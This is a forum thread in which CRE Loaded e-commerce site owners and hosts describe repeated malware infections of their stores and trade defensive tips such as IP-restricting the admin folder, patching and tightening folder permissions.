Hi,

I am having a serious issue of virus with almost all my sites running creloaded 6.2.

They are getting infected repeatedly by some virus. It infects all php pages and in some instances, creates random folders such as :

/catalog/llft/vjw-einz-sszfk.html
/catalog/bxnl/wso-ecry-tplli.html
/catalog/wwsw/ccm-xmat-bficd.html
/catalog/jzlw/hro-ovqi-bqvry.html
/catalog/lxdt/nud-xahn-viojz.html

I have patched up my cart to Patch 14 and have also secured admin area with password protected folder, but virus comes back after a day.

Has anyone seen this issue before ? Can the community help me please ? I read all the security threads posted in this forum, but none matches with my situation

Please help.

Regards,

fastDNS

I have had a few sites 6.4 hacked lately. My host removed the virus, but i am looked to stop it from happening again. Anyone know if the patches will stop it?

My v6.2 B2B[13.1 (SP1)] was also getting hacked. One of the symptoms was that my "Define MainPage" text disappears.

Here is my solution (symptoms follow)

Since all the attacks were via the /admin/ directory, and since it did not have time to patch all the possible files, I have simply restricted access to all /admin/ files, to selected IP addresses, by adding to /admin/.htaccess the following configuration:

Original end of /admin/.htaccess file:

Modified end of /admin/.htaccess file:
Where the "allow from" IP address correspond to your (and authorised IP address). You can check your own IP address at IP Chicken.

Symptoms of the hacks

Here's what I discovered.

My log files showed a number of accesses from the Ukraine (IP=91.211.16.126), showing exploits of one or more of the following:

Note that some of these do not access the /admin/ directory directly.

I found a number of unauthorized files in my admin/images/ folder, include some beginning with the string "goog1e" (not google), containing the code:

And also an unauthorized file called mhp.php containing the following code:

The latter seems to acquire your customer passwords (though these should not be stored in your database!).

And finally

On entering the Admin login screen, there are often messages to upgrade to the next version of CRE Loaded. I do not recall ever seeing a note that there is a security patch.

Thanks Ian. Very helpful. I've been hacked about 10 times in 4 months.

@fastdns

Make sure malicious files does not remain uploaded under your account. It is very good that you have pass protected the admin directory.

However, you might already have a malicious script uploaded that allows the attacker access to your website. You should make sure all files are clean.

Don't think that works using <limit> containers... if you want to restrict admin access to certain IP addresses I'd try:



Should also point out that you don't necessarily need all 4 'octets' of the IP address - this is particularly useful to know if you're on a dynamic IP (which a lot of people are.) Often ISPs assign a limited range to users which doesn't change that often and using this example you might be ok to allow from 11.22 or allow from 123.123

My 5c worth,
Simon

Thanks to those that gave the security tips.

I will have Charles review this thread to ensure we have addressed any exposures.

We are also being hacked repeatedly on all sites from 6.2.14 to 6.4. Why doesn't CreLoaded have security measures like the ones in osCommerce?

What can we do aside from blocking IP addresses, modifying the htaccess file and password protecting the admin? We have gotten hacked even when all three of those options have been completed.

I think a better question is 'why doesn't Cre update it's software more frequently?' - given that the last patch was Xmas 2009. A basic (and arguably the most important) security measure is to stay current - upgrade/update to the latest version of the software. If the company can't keep up then your choice is pretty obvious.

However, no cart software is 'hack proof' indefinitely, you just reduce the chance of getting hacked by how you run your store. Also the hosting company has just as important role in securing the server - there are many configuration settings that can improve your site's security dramatically.

Are you certain you removed all traces of a hack attempt? Hey, give an example store via pm if you like - I'll check for some obvious flaws and let yer know!

Simon

this is happening to login.php and languages/***/login.php as well
those files are just plain disappearing in the free cre versions, and going blank on the pro versions..
and this is WITH a double admin login (.htaccess required login added)

i haven't found the malicious files causing it yet .. will post back when i do in case they are out to get anyone else.

The key word in the title of this thread is "sites".

I've cleaned up a number of these sites in the past few years. The log entries mentioned are typical - but have NOT been demonstrably effective in penetrating clean cart setups of the same version yet.

What is pretty consistent is that if caught early, when FTP logs are available the files in question can be seen to have been uploaded using a valid set of FTP credentials......

The lack of response by CRE is disturbing we have had 4 sites hacked and it is not just 6.2.14 ... whats disturbing is the last CRE login was 10/30/2010 and there is not a patch or a fix to be found on the net ... is CRE a shopping cart or a credit card processor sometime they have to decide ... the internet has changed so much but from 1996 to today (original site on Xoom) I cannot find a cart that delivers and worse really takes this stuff serious ... but they are very quick to accept you money and sell you services that are like calling a cable company ....

Sal you really need to start living up to the narcissistic "visionary" you claim to be 10/30 and no response not the impression anyone gives a crap.

Leaving CRE

I've just done two days working 19 hours a day to move my site from b2b 6.2 to comunity 6.4 in the hope that a hacker will go away.

For over a week one of my sites has been hit with XSS hacks. The solution is easy enough I just copied over a clean set of files I keep. I did that every few days at the start but the last attack was within minuites of the clean up.

Thing is I'm also in the middle of moving the site over to another cart so this is all work that will be lost in a month or so.

Hey guys one thing I noticed in mine that may or maynot help... There is a file being dropped in my main public_html folder called postinfo.php. It was one that continued to add javascript to the site. Check and makesure you dont have it on your server. That wasnt the only problem but definately one of them.

I host around 200 CRE Loaded domains and this is a constant issue..

This hack rips your data base for users and then sends out emails using the same script.. in some instances the email is for drugs, others are redirects to other trojan infected sites..

TRULY A PAIN for me in general..

The intrusion comes from one of several places the most common is the /images folder.. The security issue is that the folder must be set at 777 for image uploads (that are all owned incidentally by "nobody") They force the script uploads, parse your database and then use your account to send 10's of thousands of emails..
Any other folder set to 777 is vulnerable without taking specific precautions...

We have been forced to install cronjobs to set folders to 755 and files to 644 in OSCommerce stores (CRE included)

We are forced to "boot" clients that have repeat intrusions as we can not babysit every store ourselves..

For the developers.. Needing folders set at 777 is a real issue for us, as is files on shared servers owned by "nobody"

I make a substantial amount of income fixing these sites (time is not free sorry to say) but finding my IP's on RBL"s is a bigger issue from the spam sent out..